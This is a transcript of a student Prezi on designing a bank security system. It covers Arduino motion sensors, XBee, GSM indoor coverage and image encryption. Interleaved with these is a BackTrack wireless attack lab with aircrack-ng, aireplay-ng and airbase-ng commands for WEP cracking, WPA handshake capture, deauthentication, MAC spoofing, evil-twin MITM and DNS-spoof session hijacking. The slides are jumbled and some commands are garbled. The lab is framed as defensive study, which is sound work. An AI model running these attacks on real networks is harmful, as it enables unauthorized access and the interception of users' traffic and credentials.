Send the link below via email or IMCopy
Present to your audienceStart remote presentation
- Invited audience members will follow you as you navigate and present
- People invited to a presentation do not need a Prezi account
- This link expires 10 minutes after you close the presentation
- A maximum of 30 users can follow your presentation
- Learn more about this feature in our knowledge base article
Transcript of Untitled Prezi
Idea of detect motion
the pc control our system to be day or night
we can control our system wirelessly using xbee
the used wireless system must be compatible with arduino & sensors
Arduino programme flow chart
The Network Is Divided Into 3 Major Network ,
We Did Design The Network According To :
1-The Internal Network Of The Bank
2-The Service Provider Network
3-The Other Site OF The Network In Another City
What Network Did We Design ?
1-Multi-Site Network ( Wired Network )
2-Multi-Site Network (VOIP Network )
3-Single-Site Network (Wireless Network )
What About The wired Security It Self ?
GSM transmission chain
About The Designed Firewall
What About The Wired Network It Self
What Is Lockitron ?
It's A Mobil Application Allows You To Remotely Open And Close Doors …
What Is Has To Do With Our Project ?
We Did Replace The Card Reader Owned By Each Employee With That Mobile Application On Each Employee Mobil
3-Flexable ( Can Be Repaired And Tuned Easily )
Our Main Focus In The Project Is To Design A Security System for A Bank and we’re Considering Everything in That Secure System
Our Security system Involves In 5 Major Topics Which Are :
1-Control And Surveillance
4-Indoor Coverage ( Gsm Coverage )
The addition of WLANs to the corporate environment class of threats for network security. introduces a new Rogue access points are the greatest threat
What is Rogue AP!!
What are some specific attacks which can be launched through Rogue AP?
1. MAC address spoofing
Evil twin with mac spoofing
how can you protect enterprise network from Rogue APs?
* Can the firewall protect from Rogue AP
signal transmission problems
Example of ENCRYPTED IMAGE
(motion detection )
Frame of camera
Wireless Lab Setup :
1- Hardware Requirements
1 – iwconfig
2- ifconfig wlan1 up
Testing connectivity between the tester laptop and the access point :
- Commands :
1- iwlist wlan1 scanning
2- iwconfig wlan1 essid "ESLAM TEST“
- iwconfig wlan1
- Wlan Frames Types : 1- Managements Frames
2- Control Frames
3- Data Frames
-Meaning of Sniffing Frames .
-Sniffing Management, Control, and Data Frames over any wireless network :
1- Monitor mode interface
----- 1- Monitor mode interface :
b- airmon-ng start wlan1
----- 2- Wireshark :
a- Wireshark& . capture interfaces mon0 start
b- Filter: - Management Frames Only ‘s command wlan.fc.type == 0
- Control Frames Only ‘s command wlan.fc.type == 1
- Data Frames Only ‘s command wlan.fc.type == 2
- Sniffing Management, Control, and Data Frames over a Given wireless network :
- Commands :
1- airodump-ng --bssid A0:F3:C1:78:32:4B mon0
2- iwconfig mon0 channel 6
- iwconfig mon0
3- Wireshark& . capture interfaces mon0 start
4- Filter : wlan.bssid == A0:F3:C1:78:32:4B
5– Filter : Data Packets Only (wlan.bssid == 00:21:91:d2:8e:25) && (wlan.fc.type_subtype == 0x20)
Injecting packets into a given wireless network :
- Packets Injection Meaning .
1- aireplay-ng -9 -e ESLAM TEST -a A0:F3:C1:78:32:4B mon0
Uncovering hidden SSIDs :
1- legitimate client ( Probe Request, Probe Response )
2- sending Deauthentication packets.
Command : aireplay-ng -0 5 -a A0:F3:C1:78:32:4B mon0
( Probe Request, Probe Response
MAC filters :
Setting up the Wireless Card ( Alfa ) and configuring it
- Beating MAC Filters :
- Commands :1- airodump-ng –c 6 -a –bssid A0:F3:C1:78:32:4B mon0
Commands :2- macchanger –m B0:EC:71:B1:8A:17 wlan1
Authentication Types :
1 - Open
2- Shared Key
3- Wired Equivalent Privacy ( WEP )
4- Wi-Fi Protection Access ( WPA )
5- Wi-Fi Protection Access V2 (WPA2)
1- OPEN Authentication :
-Bypassing OPEN Authentication :
-Commands : a- iwconfig wlan1 essid "ESLAM TEST"
b- iwconfig wlan1
2 – Shared Key Authentication :
- Bypassing Shared Key Authentication :
Commands : a- Wireshark& capture interfaces mon0 start
b- airodump-ng mon0 –c 1 --bssid A0:F3:C1:78:32:4B -w keystream
d- aireplay-ng -1 0 -e ESLAM TEST -y keystream-04-A0-F3-C1-78-32-4B.xor -a A0:F3:C1:78:32:4B -h aa:aa:aa:aa:aa:aa mon0
e- On wireshark Filter : wlan.addr == aa:aa:aa:aa:aa:aa
---- First Packet :
---- Second Packet :
---- Third Packet :
---- Fourth Packet :
3- WEP Encryption :
- Bypassing WEP Encryption :
- Commands :
a- airodump-ng mon0
b- airodump-ng –bssid A0:F3:C1:78:32:4B --channel 1 --write WEPCrackingDemo mon0
C- aireplay-ng -3 –b A0:D3:C1:78:32:B4 –h B0:EC:71:B1:8A:17 mon0 - Capture ARP packets .
d- aircrack-ng WEPCRackingDemo-01.cap
Which type of detection can I use
Motion detection camera
2- Adjacent channel interference
3- Multipath fading
4- Shadow fading
5- Doppler shift
6- Delay Spread (Time Dispersion)
7- Distance Between MS and BTS
8- Path loss
1. Analog to digital converting
(GSM use PCM ‘Pulse Code Modulation’ )
We reduce BW
Bandlimiting + Sampling
Number of level =2^13=8192 level
Encoder rate = 8000*13= 104Kb/sec
We divided the signal into gropes and each grope takes 20ms and has 2080 bits
Add 3bits called ‘Parity Check Bits’
* Block interleaving
* Burst interleaving
Burst Assembly and Multiplexing
Here we adding Training Sequence, Flags, T.B and H.B
GMSK ‘Gaussian Minimum Shift Keying’ is the modulation scheme for GSM system
is the process of encoding messages (or information) in such a way that hackers cannot read it, the message or information (referred to as plaintext) is encrypted using an encryption algorithm, turning it into an unreadable Ciphertext .
This is usually done with the use of an Encryption key
Usage of Enfcryption start for the first time by simple way done by shift every letter 3 time
THE RC6 Algorithm
it's look like The Alogritm using for text but we deal with images so to encrypt image we will encrypt the image pixel to produce Scattered pixel hard to understand
By this we will have image unclear for other so we able to save the image security form hacker
i will translate some of the last steps and add new steps into matlab code
Some Additions to develope the code
1-Instead of using fixed key we can take a key from command window
in matlab with some conditions
2- We can use the shift oerations to make the decrypted image more
unclear to attacker
3- We can divide the image into more than 4 part and the divided can
done by equal length part or equal wide part or both them
4-When collect the parts for formation the image can follow many
arranging instead of the using in the code
Distributed Antenna System or ‘DAS’
Donor (roof) antenna
* Directional antenna
The higher the gain of the antenna, the more the signal is focused along a specific plane.
BDA (Bi-Directional RF Amplifier)
BDA (Bi-Directional RF Amplifier)
* Omni directional antenna
Basic Single Structure application
The range of the different types of antenna
1. Bi-directional Amplifier (BDA)
* Poor out-of-band rejection
* Fixed filtering
2. Analog RF booster
* Better filtering
* Multiple bands
3. Digital RF booster
CHARACTERISTICS OF EACH DESIGN
* The delay through a filter is inversely proportional to its bandwidth and directly proportional to the filter ‘order’
* Filter that is narrow band with a sharp roll off will have a higher time delay than will a wide band filter with a soft roll off.
* Preventing Feedback Oscillations
* Automatic Gain Control (AGC)
* Microprocessor-Controlled AGC
* Automatic Gain Optimization during set up
* Oscillation Prevention
* Long Term Maintenance
Base Station Disease
Other Services Disease
Single Structure Fiber Optic application
Multiple Structure 'Campus' application
Example of RF distribution on one floor
represent unauthorized access points and can be internal or external
Why is Rogue AP such a bad thing?
Rogue AP on network =(logically) LAN jack of your network hanging out of the premises
We have two types for rouge access point
1.The internal rogue AP
2.The external rogue access point
3.Man-in-the-Middle Attack (mitm)
4.Monitoring WLAN traffic and breaking
the encryption keys
-Firewall works at traffic transfer point between LAN & Internet
-Firewall does not detect Rogue AP
-Firewall does not see traffic through Rogue AP
* Can the wpa2 protect from Rogue AP?
You can enforce security controls such as WPA2 only on APs which you manage,
i.e., your Authorized APs
But, Rogue AP is not your managed AP
* So what protects network from Rogue APs!!!
Sensor based wireless intrusion
prevention system (WIPS)
Watches for Rogue APs 24x7 Performs wired/wireless correlation for AP network connectivity testing
to detect Rogue AP
Provides for automatic blocking of Rogue AP
Locates Rogue AP for easy searching and removal from the network
A typical wireless intrusion prevention system consist of:
What does AP auto-classification mean in the context
of Rogue AP ?
What is key technology enabler for accurate autoclassification testing of AP’s connectivity to monitored enterprise network is the key technology enabler
How can wips detect rouge access point?
1) MAC Correlation (mac table lookup)
Can be done using back track&alfa card
a. The administrator has provided us with the list of MAC addresses of authorized clients and access points
we create the monitor mode using our card as shown
We use this command to start scanning the air seen by the alfa card
We dump a list of all MAC addresses on the switch of the clients network.In the most common case, the wired and wireless interface MAC addresses differ by 1.
2)Signature Packet Injection
The main types of events which can be detected by wireless intrusion prevention systems
1 . unauthorized WLANs and WLAN devices
(rogue APs, unauthorized stations);
This can be done also using backtrack
look at the client part of the airodump-ng output:
2. misconfigured access point
3. the use of wireless network scanners
4. Denial of Service (DoS)
5. man-in-the-middle attacks.
6. unusual usage patterns
How does wips contain rouge access point
2. Vector method:
Locating(physical place) rogue wireless access points without using wips :
2- Software Requirements
a. Two LapTop’s with internal Wi-Fi Cards.
b. One Access point.
c. One Alfa Wireless Card.
d. An internet connection.
a. BackTrack 5.
-Setting up an access point and configuring it :
We used arduino board based on avr micro controller chip .
صwe used avr micro controlller becouse of
2.simple to program
4. avaliable from 8-64 pins
Small micro controller bored based on atmega 32u4
How to create a rouge access point throught backtrack
1. Let us first bring up our Rogue access point using airbase-ng and give it the ESSID Rogue:
2. use this commands to create a bridge between R ap &Ethernet interface.
The attacks that can be launched through backtrack
Microcontroller: ATMEGA 32U4
Operating voltage: 5V
Input voltages (limits): 6-20V
Input/out put pins: 14 pins
PWM pins : 7 pins
Analoge inputs: 6 pins
Dc current for i/o pins : 40 mA
Flash memory : 32 KB
SRAM: 2.5 KB
Clock speed: 16 MHZ
why we used arduino ?
From sotware side
simple to progam
Has alot of examples
Has agerat varity libraries
Cross platform working on windows, MAC , lineux
From hardware side
Power soket&rest button
sockts for I/O pins
can power up by USB
open source (hardware &software)
what is arduino ?
AVR is just programmable integrated circuit
Arduino is mini system has ( AVR micro controller, power supply circuit ,reset circuit ,usb connection)
what types of arduino ?
How does it work ?
1.Write a code (sketch) on arduino IDE by arduino c language
2. then select board, serial com
3.Upload it at arduino board
In arduino programming there are two main function:
Void setup ()
To define inputs and out put
To write a code here and repeated for ever
How does arduino communicate ?
Arduino uses UART for serial communications over a computer.
What the meant by serial communication?
Single data line transmitting data
It has two types (synchronous &Asynchronous)
What the meant by UART?
1.It is Arduino hardware has built-in support for serial communication on pins 0 and 1
which also goes to the computer via the USB connection.
2.This hardware allows the Atmega chip to receive serial communication even while working on other tasks, as long as there room in the 64 byte serial buffer.
General information about UART?
1.Universal Asynchronous Receiver/Transmitter (UART)
takes bytes of data and transmits the individual bits in a sequenance.
2. UART frame format(8-N-1)ز
What About The Wireless Network It Self
What the different between arduino and normal microcontroller (AVR)?
What About The VOIP Network
There are three types of sensor which depend
on infrared radiation:
1.Passive infrared sensor
1. Passive infra red sensor
Idea of pir in detecting motion
Pir consist of:
First we must know why we need to know about attacks ?
By study the types of attacks we will have the ability to know if we are exposed to Attack or not
Imagine that u have no idea about the attacks you sure will be hackerd to easy
First we make access point with the same SSID of the vicinity access point Many wireless users may accidently connect to this malicious access point thinking it is part of the authorized network. Once a connection is established, the attacker can orchestrate a man-in-the-middle attack and transparently relay traffic while eavesdropping on the entire communication
Problems of pir &how to avoid it ?
1.No response for human motion
IR window filter
- Now we send a De-Authentication frame to the client,
so it disconnects and immediately tries to re-connect
-As we are closer to this client, our signal strength is higher and it connects to our Evil Twin access point as shown in the following screens
An evil twin having the same MAC address as an authorized access point is even more difficult to detect and deter
Calibration for sensor
Angle : 120
Distance : 7m max
Advantage of sensor
Low power consumption
Wide range lens
Easy to interface with it
Normally, when a wireless client such as a laptop is turned on, it will probe for the networks it has previously connected to. These networks are stored in a list called the Preferred Network List (PNL) on Windows-based systems. Also, along with this list, it will display any networks available in its range
If we creating a fake access point Wireless Lab in the presence of the legitimate one And the client is still connected to the legitimate access point Wireless Lab
So we need to send broadcast De-Authentication messages to the client on behalf of the legitimate access point to break their connection
2.Infrared sensor :
Idea of ir sensor
The Hirte attack extends the Caffe Latte attack using fragmentation techniques and allows for almost any packet to be used By creating WEP access point and once any client connects to out Honeypot AP, the Hirte attack is automatically launched
NOW would it be possible to crack WPA-Personal with just the client? No access point!
To crack WPA, we need the following four parameters from the Four-Way Handshake— Authenticator Nounce, Supplicant Nounce, Authenticator MAC, Supplicant MAC. Now the interesting thing is that we do not need all of the four packets in the handshake to extract this information. We can get this information with either all four packets, or packet 1 and 2, or just packet 2 and 3.
switch change between open &close by:
temperature like thermostat
current &voltage like relay
pressure as our state
In order to crack WPA-PSK, we will bring up a WPA-PSK Honeypot and when the client connects to us, only Message 1 and Message 2 will come through. As we do not know the passphrase, we cannot send Message 3. However, Message 1 and Message 2 contain all the information required to begin the key cracking process
-We will setup a WPA-PSK Honeypot with the ESSID Wireless Lab
-Let's also start airodump-ng to capture packets from this network:
-Now when our roaming client connects to this access point, it starts the handshake but fails to complete it after Message 2 as discussed previously
the attacker is connected to the Internet using a wired LAN and is creating a fake access point on his client card. This access point broadcasts an SSID similar to a local hotspot in the vicinity. A user may accidently get connected to this fake access point (or can be forced to using the higher signal strength theory) and may continue to believe that he is connected to the legitimate access point.
The attacker can now transparently forward all the user's traffic over the Internet using the bridge he has created between the wired and wireless interfaces
The Steps :
1-we will first c create a soft access point called mitm on the hacker laptop using airbase-ng. We run the command airbase-ng --essid mitm –c 11 mon0:
2-now create a bridge on the hacker laptop, consisting of the wired (eth0) and wireless interface (at0)
3-Let us now turn on IP Forwarding in the kernel so that routing and packet forwarding can happen correctly using echo > 1 /proc/sys/net/ipv4/ip_forward:
4-Now let us connect a wireless client to our access point mitm. It would automatically get an
IP address over DHCP (server running on the wired-side gateway).
5-We see that the host responds to the ping requests as seen
6-We can also verify that the client is connected by looking at the airbase-ng terminal on the hacker machine:
It is interesting to note here that because all the traffic is being relayed from the wireless interface to the wired-side, we have full control over the traffic
Wireless Eavesdropping using MITM
The whole lab revolves around the principle that all the victim's traffic is now routed through the attacker's computer. Thus the attacker can eavesdrop on all the traffic sent to and from the victim's machine over wireless
Start sniffing on the at0 interface, so that we can monitor all traffic sent and received by the wireless client
When the wireless client open up any web page that need password to enter and by sniffing the packet and set a filter for HTTP to see only the web traffic
we can easily locate the HTTP post request, which was used to send the password to the wireless access point
Expanding on the HTTP header, allows us to see that actually the password we entered in plaintext was not sent as is, but instead, a hash has been sent
Session Hijacking over wireless
One of the other interesting attacks we can build on top of
MITM is application session hijacking. During an MITM attack, the victim's packets are sent to the attacker. It is now the attacker's responsibility to relay this to the legitimate destination and relay the responses from the destination to the victim. An interesting thing to note is that, during this process the attacker can modify the data in the packets (if unencrypted and sunprotected from tampering). This means he could modify, mangle, and even silently drop packets.
The Steps :
1-Set up the test exactly as in the Man-in-the-Middle attack lab.
On the victim let's fire up the browser and type in "google.com". Let us use Wireshark to monitor this traffic. Your screen should resemble the following
2-In order to hijack the browser session we will need to send fake DNS responses which will resolve the IP address of "google.com" to the hacker machine's IP address 192.168.0.199. The tool we will use for this is called Dnsspoof and the syntax is dnspoof –i mitm-bridge:
3-Refresh the browser windows and now as we can see through Wireshark, as soon as the victim makes a DNS request for any host (including google.com), Dnsspoof replies back:
On the victim machine, we see an error which says "Connection Refused". This is because we have made the IP address for google.com as 192.168.0.199 which is the hacker machine's IP, but there is no service listening on port 80:
4-Let us run Apache on Back Track using the following command apachet2ctl start:
5-Now once we refresh the browser on the victim, we are greeted with It Works default page of Apache:
This demonstration shows how it is possible to intercept data and send spoofed responses to hijack sessions on the victim.
we faced more than oe option comptiable with the arduino the most used
we used xbee
what is xbee?
just blue chip have 20 pins
RF module can send data wireless
Current manufacturers for XBEE's are DIGI
why xbee ?
uses standard IEEE 802.15.4 (LR-WAPN)
low power consumption
low data rate
types of xbee
> 30 m range indoor
> digi mesh network
> 40 m range indoor
> zigbee network
xbee series 1
pro & regular